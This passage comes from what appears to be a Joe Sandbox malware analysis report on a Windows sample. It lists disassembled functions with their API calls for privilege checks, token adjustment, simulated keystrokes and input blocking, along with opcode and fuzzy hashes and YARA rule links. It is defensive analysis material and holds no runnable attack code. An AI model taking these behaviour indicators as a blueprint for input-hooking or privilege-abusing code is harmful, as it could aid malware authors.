                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 33631002-0
                                                                                                                  • Opcode ID: 0e9a2ba3bcff6e2701e34bbf6fe3bd87a04c6015827d6692d99c9f8b4720d11d
                                                                                                                  • Instruction ID: 091708a47fbb32750fd9cfdb1631cb6ba504ee86846fb61e4a8e5c8d4d241ba6
                                                                                                                  • Opcode Fuzzy Hash: 0e9a2ba3bcff6e2701e34bbf6fe3bd87a04c6015827d6692d99c9f8b4720d11d
                                                                                                                  • Instruction Fuzzy Hash: CE113C75E05228BBDB208F999C45FAFBFBCEB46B50F108155F904E7290D6B05A058BA1
                                                                                                                  Function 00B11663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B1168C
                                                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B116A1
                                                                                                                  • FreeSid.ADVAPI32(?), ref: 00B116B1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3429775523-0
                                                                                                                  • Opcode ID: 5fece2eac7548509a2f91fa8da064e0b73ffaec1587f741e3779baaf85c0bb7c
                                                                                                                  • Instruction ID: 0f35468562305215cca28c26d6a2a37962932eb687cf03b462c09e82df4d3576
                                                                                                                  • Opcode Fuzzy Hash: 5fece2eac7548509a2f91fa8da064e0b73ffaec1587f741e3779baaf85c0bb7c
                                                                                                                  • Instruction Fuzzy Hash: D4F0F475A51309FBDB00DFE49C89AAEBBBCFB08605F5049A5E501E2281E774AA448A54
                                                                                                                  Function 00AD4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32(00AE28E9,?,00AD4CBE,00AE28E9,00B788B8,0000000C,00AD4E15,00AE28E9,00000002,00000000,?,00AE28E9), ref: 00AD4D09
                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,00AD4CBE,00AE28E9,00B788B8,0000000C,00AD4E15,00AE28E9,00000002,00000000,?,00AE28E9), ref: 00AD4D10
                                                                                                                  • ExitProcess.KERNEL32 ref: 00AD4D22
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1703294689-0
                                                                                                                  • Opcode ID: 40ccfd5c8423a9a88e1b586008d5fa65a4db437e8ae4d9749eeb69347087528f
                                                                                                                  • Instruction ID: 81ae648ad613eda1f5261eba116437cf0044cdeff90b5e03af5ba32ac3543788
                                                                                                                  • Opcode Fuzzy Hash: 40ccfd5c8423a9a88e1b586008d5fa65a4db437e8ae4d9749eeb69347087528f
                                                                                                                  • Instruction Fuzzy Hash: 5CE0B635001188AFCF61AF64DE09A593F6AFB46B81B144015FC569B222CB35DE42CA84
                                                                                                                  Function 00AEC2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: /
                                                                                                                  • API String ID: 0-2043925204
                                                                                                                  • Opcode ID: 9a0f2913d7e6f3cf07556569badab25a255b0a2881fb62663311626161663dd8
                                                                                                                  • Instruction ID: 654b4b2059695148603ac184f115af7f548848f76fa913531ba81a3adad9b7e3
                                                                                                                  • Opcode Fuzzy Hash: 9a0f2913d7e6f3cf07556569badab25a255b0a2881fb62663311626161663dd8
                                                                                                                  • Instruction Fuzzy Hash: D3413B765002596FCB20AFBACC49EBBB77CEB84724F10426DF915DB180E6709D82CB50
                                                                                                                  Function 00B0D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 00B0D28C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: NameUser
                                                                                                                  • String ID: X64
                                                                                                                  • API String ID: 2645101109-893830106
                                                                                                                  • Opcode ID: 504844cbc403c042f04e9303de3c39dd394d74dc550700bc1facafe02461f37e
                                                                                                                  • Instruction ID: 9dea95569506dc248549d49192f0edac32a6cdf7107010586301e0efab1c711e
                                                                                                                  • Opcode Fuzzy Hash: 504844cbc403c042f04e9303de3c39dd394d74dc550700bc1facafe02461f37e
                                                                                                                  • Instruction Fuzzy Hash: DCD0C9B480211DEBCB90CB94DCC8DD9B7BCBB04305F100195F106A2140DB3096488F10
                                                                                                                  Function 00ADCAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                                  • Instruction ID: 60bd4f9d61c20c4e40f39090ef4c0f3c26ee30c45c41ad2dd44b5f95c368f28b
                                                                                                                  • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                                  • Instruction Fuzzy Hash: 1E021E71E0021A9FDF14CFA9C9806ADFBF1EF48324F65416AD91AE7384D731AA41CB94
                                                                                                                  Function 00B268EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00B26918
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00B26961
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2295610775-0
                                                                                                                  • Opcode ID: 279dff4990d09f56c19b9042e7c77dcc07792058925189147f77a9e9abbaa29b
                                                                                                                  • Instruction ID: c090da4702aac84b82b4bb546c4b60d5cd2df2905802539f3a0fff1f88002de5
                                                                                                                  • Opcode Fuzzy Hash: 279dff4990d09f56c19b9042e7c77dcc07792058925189147f77a9e9abbaa29b
                                                                                                                  • Instruction Fuzzy Hash: CD11D0356042109FC710CF29D488A26BBE4FF89328F04C699F4698F2A2CB70EC45CB90
                                                                                                                  Function 00B237B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00B34891,?,?,00000035,?), ref: 00B237E4
                                                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00B34891,?,?,00000035,?), ref: 00B237F4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3479602957-0
                                                                                                                  • Opcode ID: e0db6b9266eea740af242633c0b32eed6aa576b436fbefd8ee787a4d3d611716
                                                                                                                  • Instruction ID: 6e4bf47cafe063beaac734bba219909bb35aec8216c3c350ab21d50473a9442e
                                                                                                                  • Opcode Fuzzy Hash: e0db6b9266eea740af242633c0b32eed6aa576b436fbefd8ee787a4d3d611716
                                                                                                                  • Instruction Fuzzy Hash: 46F0EC746052286BDB5017A65D4DFEB3ADDEFC5B61F000165F509D3191D9609D04C7B1
                                                                                                                  Function 00B1B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00B1B25D
                                                                                                                  • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00B1B270
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InputSendkeybd_event
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3536248340-0
                                                                                                                  • Opcode ID: c855308661696165d0a39a7e154993ea14a226a41854c2d370df8399f55afe65
                                                                                                                  • Instruction ID: 63c5cc5576fe3510fdf2743f0ea6a3d625ad7bdd8b4ffc56ba92e71544f4b0ce
                                                                                                                  • Opcode Fuzzy Hash: c855308661696165d0a39a7e154993ea14a226a41854c2d370df8399f55afe65
                                                                                                                  • Instruction Fuzzy Hash: BBF0677480428EABDB058FA0C806BEE7FB0FF08309F00804AF961A61A2C77986059F94
                                                                                                                  Function 00B110BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B111FC), ref: 00B110D4
                                                                                                                  • CloseHandle.KERNEL32(?,?,00B111FC), ref: 00B110E9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 81990902-0
                                                                                                                  • Opcode ID: 192208def3fb8a018f10c2712c1d4223e5df5f81fd803cb3748264c95cb272ff
                                                                                                                  • Instruction ID: 056d137fa65d28ce783bf8c90d8a048bf4d04215e0ce6d72744c68fd48db84eb
                                                                                                                  • Opcode Fuzzy Hash: 192208def3fb8a018f10c2712c1d4223e5df5f81fd803cb3748264c95cb272ff
                                                                                                                  • Instruction Fuzzy Hash: BBE04F32005610AEE7252B15FC09F737BE9FB04710B10882DF5A6814B1DB626C90DB14
                                                                                                                  Function 00ABCAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • Variable is not of type 'Object'., xrefs: 00B00C40
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: Variable is not of type 'Object'.
                                                                                                                  • API String ID: 0-1840281001
                                                                                                                  • Opcode ID: 5ea73a9c1a6e1fbd9fcb0409782ce0ec610f6c1a42a89eb8aa0d0839ab70fa87
                                                                                                                  • Instruction ID: 2cea1af7d017262117ccd1cadc2371f6c607e0f279a3c44d0a5e74072926cbbc
                                                                                                                  • Opcode Fuzzy Hash: 5ea73a9c1a6e1fbd9fcb0409782ce0ec610f6c1a42a89eb8aa0d0839ab70fa87
                                                                                                                  • Instruction Fuzzy Hash: 0A328A34910218DBCF14EF94C981FEDBBB9FF15314F1480A9E806AB292DB75AE45CB60
                                                                                                                  Function 00AE676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00AE6766,?,?,00000008,?,?,00AEFEFE,00000000), ref: 00AE6998
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionRaise
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3997070919-0
                                                                                                                  • Opcode ID: 4cca42c8ce9e72f99a58cf7778bea8a5ef544e0391cac78c14571f40180aa7e0
                                                                                                                  • Instruction ID: d888daa2dd87c5fea7deb83111e62ca4a6d62100863531861e94f216f8069900
                                                                                                                  • Opcode Fuzzy Hash: 4cca42c8ce9e72f99a58cf7778bea8a5ef544e0391cac78c14571f40180aa7e0
                                                                                                                  • Instruction Fuzzy Hash: 1FB15A71610648DFD719CF29C48AB657BF0FF553A4F298A58E899CF2A2C335E981CB40
                                                                                                                  Function 00ACB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 0-3916222277
                                                                                                                  • Opcode ID: c9857ca83bf8600f92f27d7e9eee5c09e4c6fc855eb90af4a8eb2867e687f4a8
                                                                                                                  • Instruction ID: 22bca97e9af321e3ee90d861896a39f8c0d528ba758f5cbf9a616e0908610da7
                                                                                                                  • Opcode Fuzzy Hash: c9857ca83bf8600f92f27d7e9eee5c09e4c6fc855eb90af4a8eb2867e687f4a8
                                                                                                                  • Instruction Fuzzy Hash: F3124075910229DBCB14CF58C981BEEB7F5FF48710F15819AE849EB291DB319A81CFA0
                                                                                                                  Function 00B2EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • BlockInput.USER32(00000001), ref: 00B2EABD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BlockInput
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3456056419-0
                                                                                                                  • Opcode ID: 86d29acdd4b97d2fcad80d1cb3c9f5323d39c84feb464daf650811d4fcb0ccb7
                                                                                                                  • Instruction ID: 9c070dad6e894f70342bee9c10506fa42bae67dbcbc7ed87334045ddd970d470
                                                                                                                  • Opcode Fuzzy Hash: 86d29acdd4b97d2fcad80d1cb3c9f5323d39c84feb464daf650811d4fcb0ccb7
                                                                                                                  • Instruction Fuzzy Hash: 87E012352102149FC710DF5AD444D9AB7EDAF59760F00845AFC4AC7251DB70E8408B91
                                                                                                                  Function 00AD09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00AD03EE), ref: 00AD09DA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3192549508-0
                                                                                                                  • Opcode ID: 8ef84a580350c3c3f52d9ff120bad5612792c1ec050bec296436f866661499d9
                                                                                                                  • Instruction ID: 186876142a242024687668bca15dedc64fe8eb2930b32d85624582742d26bb76
                                                                                                                  • Opcode Fuzzy Hash: 8ef84a580350c3c3f52d9ff120bad5612792c1ec050bec296436f866661499d9
                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                  Function 00AD781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 0-4108050209
                                                                                                                  • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                  • Instruction ID: 263d2c0ad9bdeaf1229c24e67fc10a5ed890e3232fd7c9547b6abc9979b4c195
                                                                                                                  • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                  • Instruction Fuzzy Hash: 4B51557260C7455BDB3C8768896EBBE73A99B02340F18050BD887D7392FA15EE81E356
                                                                                                                  Function 00AE6DD9 Relevance: .6, Instructions: 637COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
